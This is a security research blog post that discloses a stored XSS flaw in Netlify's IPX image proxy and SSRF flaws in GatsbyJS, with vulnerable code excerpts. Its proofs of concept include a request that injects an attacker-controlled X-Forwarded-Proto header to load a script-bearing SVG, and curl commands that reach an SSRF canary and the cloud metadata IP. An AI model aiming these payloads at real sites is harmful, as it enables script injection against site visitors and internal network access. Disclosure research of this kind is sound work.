Exploiting Static Site Generators: When Static Is Not Actually Static

Oct 28, 2022

Over the last ten years, we have seen the industrialization of the content management space. A decade ago, it felt like every individual and business had a dynamic WordPress blog, loaded up with a hundred plugins to do everything from add widgets to improve performance. Over time, we realised this was a bad idea, as ensuring the security of third-party plugins seemed increasingly impossible.

People aspired to have faster websites, with less security risks. People were tired of trying to improve performance by installing a plugin like W3-Total-Cache and then later realising they were compromised because it had critical vulnerabilities.

Naturally, people started building alternatives to what felt like a broken content management system from a security and performance perspective. Some people started moving to the model of publishing their WordPress blogs in a static manner, but we also saw the rise of static site generators like Jekyll, Hugo, Gatsby and Next.js.

These static site generators promised you performance due to the fact that they did not require server-side processing (unless that was something you really wanted), and the security too, because static sites are supposed to be static right? How are you going to find vulnerabilities in a static site?

But eventually, after the rapid maturity of these static site generators, came CDN/CI platforms such as Netlify and Vercel which brought so many additional features on top of these static sites that people had always longed for. Additionally, some static site generators offered a cloud version of their offerings like Gatsby.

Unfortunately, these additional server-side features that were being offered through these platforms came with the cost that they had to run somewhere, and typically, this was “on the edge”, which is just a fancy way of saying they were ran via the respective platforms on their CDNs as serverless functions.

And now, when most people think about server-side code running on someone elses computer, especially in a serverless context, they rightfully understand that a lot of the server-side risks of compromise are no longer as impactful (i.e. SSRF), but what about the potential client-side issues that may exist?

The rise of these static site generator frameworks also hold a very important place in the Web3 world. My friend Sam Curry and his deep application security research work in the Web3 space was the main reason why I spent so much time looking at these frameworks and platforms in the first place.

You can read about Sam’s take on these issues here, in his blog post you’ll find a few more examples of vulnerabilities in Next.js’s image optimizer as well as the vulnerability we found in Netlify IPX, which we discuss in this blog also.

a screenshot showing sam curry reaching out to me on discord about some weird behaviour on a netlify next.js website

It all started with this message of Sam showing me some interesting behaviour on www.gemini.com, which is one of the largest crypto exchanges in the world, using Netlify + Next.js to host their website.

This intrigued me as from first glance it looked like there was some functionality built in to both pull and optimize images from remote sources, and it was built directly into Netlify operated websites. This reminded me of Next.js’s native image optimization functionality (found at _next/image), similar, but different, being something specific to Netlify hosted at _ipx/.

In Next.js, the image proxy is unable to pull data from remote sources without the domain being within an explicit whitelist (domain or regex), which is typically not populated by default. We thought that this implementation may be similar, so we took a look at the source code for the @netlify/ipx library.

Thankfully, Netlify had published the source code of this library on their GitHub, and you can find the vulnerable version of the code here.

When auditing the code, we noticed that Netlify’s IPX library also had mechanisms to whitelist remote HTTP sources that could be pulled through this image optimizer proxy. However, glancing at the code a few times, we noticed that the final URL that was constructed and requested was derived from a user-input that Netlify had not considered.

On line 33 of the handler, we can see that the value of the protocol variable is derived from a user controllable header x-forwarded-proto:

    const handler: Handler = async (event, _context) => {
    const host = event.headers.host
    const protocol = event.headers['x-forwarded-proto'] || 'http'

While this seems benign, it’s worth noting because of the following logic:

    let id = decodeURIComponent(segments.join('/'))

... omitted for brevity ...

    const requestHeaders: Record<string, string> = {}
    const isLocal = !id.startsWith('http')
    if (isLocal) {
      id = `${protocol}://${host}${id.startsWith('/') ? '' : '/'}${id}`
      if (event.headers.cookie) {
        requestHeaders.cookie = event.headers.cookie
      }
      if (event.headers.authorization) {
        requestHeaders.authorization = event.headers.authorization
      }
    } else {

The id variable is derived from the URL path, and a variable isLocal is declared based on whether or not the id parameter starts with the literal string http.

If isLocal evaluates to true, it constructs a URL to request through the proxy, which unfortunately can easily be tainted through the user-controllable protocol variable derived from our x-forwarded-proto header.

By sending a header and value such as x-forwarded-proto: https://evil.com/?, the constructed URL would request our website, as the ? nullifies the rest of the constructed string.

The even more unfortunate part about this code is that all of the logic checks to determine whether or not a host is whitelisted or not happens in the else statement, that we are able to skip because isLocal evaluates to true.

Since the else code block is skipped, we end up at the following block of code:

    const { response, cacheKey, responseEtag } = await loadSourceImage({
      cacheDir,
      url: id,
      requestEtag,
      modifiers,
      isLocal,
      requestHeaders
    })

The loadSourceImage function is responsible for downloading the remote resource, as well as caching it to the disk:

  let response
  try {
    response = await fetch(url, {
      headers
    })
  } catch (e) {
    return {
      response: {
        statusCode: GATEWAY_ERROR,
        headers: {
          'Content-Type': 'text/plain'
        },
        body: `Error loading source image: ${e.message} ${url}`
      }
    }
  }
... omitted for brevity ...
  const outfile = createWriteStream(inputCacheFile)
  await new Promise((resolve, reject) => {
    outfile.on('finish', resolve)
    outfile.on('error', reject)
    response.body.pipe(outfile)
  })
  return { cacheKey, responseEtag }

As you can see in the logic above, the sink which makes the HTTP request was fetch, and after the response has been obtained, it is cached to disk.

Now you might be thinking that it’s not all that bad, because, this is an image optimizer right? It should only be allowing image files, what’s the harm in that!

Unfortunately, due to the underlying use of the ipx library, which ultimately depends on the image-meta library, we can see that the SVG type is supported.

As long as the SVG file matches the following regex, the Netlify IPX handler will happily proxy the response and cache it to disk:

const svgReg = /<svg\s([^>"']|"[^"]*"|'[^']*')*>/

const extractorRegExps = {
  height: /\sheight=(['"])([^%]+?)\1/,
  root: svgReg,
  viewbox: /\sviewBox=(['"])(.+?)\1/,
  width: /\swidth=(['"])([^%]+?)\1/
}

As also stated in Sam’s blog, the final proof-of-concept for this vulnerability can be found below:

GET /_ipx/example.svg
Host: example.com
X-Forwarded-Proto: http://attacker.com/malicious.svg?

Where the contents of malicious.svg looked something like this:

<svg viewBox="0 0 200 200" xmlns="http://www.w3.org/2000/svg">
  <defs>
  <pattern id="img1" patternUnits="userSpaceOnUse" width="100" height="100">
    <image href="https://www.google.com/favicon.ico" x="0" y="0" width="100" height="100" />
  </pattern>
</defs>
  <foreignObject>
  <div id="one">
    <div id="two" xmlns="http://www.w3.org/1999/xhtml">
      <script>alert('assetnote');</script>
    </div>
  </div>
  </foreignObject>
</svg>

This resulted in persistent cross-site scripting across hundreds of thousands of Netlify websites that were using Next.js.

The impact was widespread, as by default, if you created a Next.js website on Netlify, it would automatically bootstrap the website to use package = "@netlify/plugin-nextjs" inside the netlify.toml file, which loads the netlify/ipx library into your Next.js project.

When building a Next.js website on Netlify with this plugin installed, we can see in the CI/build logs, that the following routes are registered:

9:53:04 AM:   {
9:53:04 AM:     from: '/_next/image*',
9:53:04 AM:     query: { url: ':url', w: ':width', q: ':quality' },
9:53:04 AM:     to: '/_ipx/w_:width,q_:quality/:url',
9:53:04 AM:     status: 301
9:53:04 AM:   },
9:53:04 AM:   { from: '/_ipx/*', to: '/.netlify/builders/_ipx', status: 200 },

After we had determined that the underlying netlify/ipx library was vulnerable, we started enumerating where else this functionality may have been used.

Now we’ve found a number of vulnerabilities in Netlify’s implementation of the image proxy, but what about the static site frameworks themselves? We decided to take a closer look at the GatsbyJS framework, as we had already spent a lot of time looking at Next.js.

Targeting any proxy-like functionality inside these code bases, we ended up in gatsby-plugin-utils/src/polyfill-remote-file/http-routes.ts which defined the following routes:

  app.get(`/_gatsby/file/:url/:filename`, async (req, res) => {
    const outputDir = path.join(
      global.__GATSBY?.root || process.cwd(),
      `public`,
      `_gatsby`,
      `file`
    )

    const url = req.query[ImageCDNUrlKeys.URL] as string

    const filePath = await fetchRemoteFile({
      directory: outputDir,
      url,
      name: req.params.filename,
      httpHeaders: getRequestHeadersForUrl(url, store),
    })

    fs.createReadStream(filePath).pipe(res)
  })

  app.get(`/_gatsby/image/:url/:params/:filename`, async (req, res) => {
    const { url, params, filename } = req.params
    const remoteUrl = decodeURIComponent(
      req.query[ImageCDNUrlKeys.URL] as string
    )
    const searchParams = new URLSearchParams(
      decodeURIComponent(req.query[ImageCDNUrlKeys.ARGS] as string)
    )

... omitted for brevity ...

    const filePath = await transformImage({
      outputDir,
      args: {
        url: remoteUrl,
        filename,
        httpHeaders,
        ...resizeParams,
      },
    })

    res.setHeader(
      `content-type`,
      getFileExtensionFromMimeType(path.extname(filename))
    )

    fs.createReadStream(filePath).pipe(res)
  })

For /_gatsby/file/:url/:filename, the sink was await fetchRemoteFile, and for /_gatsby/image/:url/:params/:filename the sink was await transformImage.

The first route allows you to proxy any URL, regardless of content type 😱

The second route allows you to only proxy images, this time, SVG’s are not allowed, so the impact is limited to being a blind SSRF vulnerability: Error: Expected one of: heic, heif, avif, jpeg, jpg, png, raw, tiff, tif, webp, gif, jp2, jpx, j2k, j2c for format but received svg of type string.

In order for these issues to be exploitable, the GatsbyJS server would need to be running. Now, we understand that this is an uncommon configuration as the point of these static site generators … is to actually generate static files that can be hosted.

Nonetheless, these vulnerabilities still pose a real risk to anyone that is running a GatsbyJS server using gatsby develop instead of hosting the static files or using gatsby serve.

The full-read server-side request forgery vulnerability in GatsbyJS can be exploited through the following cURL command:

❯ curl 'http://localhost:8000/_gatsby/file/5ddf5110dc1ab9ef782c3ecfbfb7d613/test.png?u=https%3A%2F%2Fssrfcanary.com/&a=w%3D42%26h%3D75%26fm%3Draw%26q%3D70' --output - | xxd

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   121    0   121    0     0    292      0 --:--:-- --:--:-- --:--:--   297
00000000: 3c68 746d 6c3e 3c68 6561 643e 3c74 6974  <html><head><tit
00000010: 6c65 3e53 5352 4620 4361 6e61 7279 207a  le>SSRF Canary z
00000020: 7978 6a35 6467 3764 3139 6a66 6473 3965  yxj5dg7d19jfds9e
00000030: 6e6e 6c34 627a 6a6d 677a 3c2f 7469 746c  nnl4bzjmgz</titl
00000040: 653e 3c2f 6865 6164 3e3c 626f 6479 3e7a  e></head><body>z
00000050: 7978 6a35 6467 3764 3139 6a66 6473 3965  yxj5dg7d19jfds9e
00000060: 6e6e 6c34 627a 6a6d 677a 3c2f 626f 6479  nnl4bzjmgz</body
00000070: 3e3c 2f68 746d 6c3e 0a                   ></html>.
~

The blind server-side request forgery vulnerability can be exploited via the following cURL command:

❯ curl 'http://localhost:8000/_gatsby/image/5ddf5110dc1ab9ef782c3ecfbfb7d613/a93f780cab7aa92bdecc09e6d0416651/test.png?u=https%3A%2F%2Fssrfcanary.com/&a=w%3D42%26h%3D75%26fm%3Draw%26q%3D70' --output - | xxd

The full-read SSRF vulnerability allowed us to hit GatsbyJS’s GCP metadata IP address:

❯ curl "https://somehost.gatsbyjs.io/_gatsby/file/5ddf5110dc1ab9ef782c3ecfbfb7d613/test.png?u=http%3A%2F%2F169.254.169.254/&a=w%3D42%26h%3D75%26fm%3Draw%26q%3D70"

computeMetadata/

It is important to note that in order to communicate further with the GCP metadata IP address and pull any sensitive information, we must provide a custom header, which is not possible through GatsbyJS’s proxy implementation. Additionally, after discussing with the Gatsby security team, they confirmed that the GCP metadata access is for their Image CDN provider, not Gatsby’s hosting infrastructure.

Upon our routine scans of our customers infrastructure for this vulnerability, we discovered that these vulnerabilities were exploitable in some configurations of GatsbyJS’s cloud product. This led to a number of high-impact high profile cross-site scripting vulnerabilities found on our customer’s attack surfaces.

You can read the official advisory from GatsbyJS regarding these vulnerabilities here: https://www.gatsbyjs.com/blog/vulnerability-patched-in-the-gatsby-cloud-image-cdn/.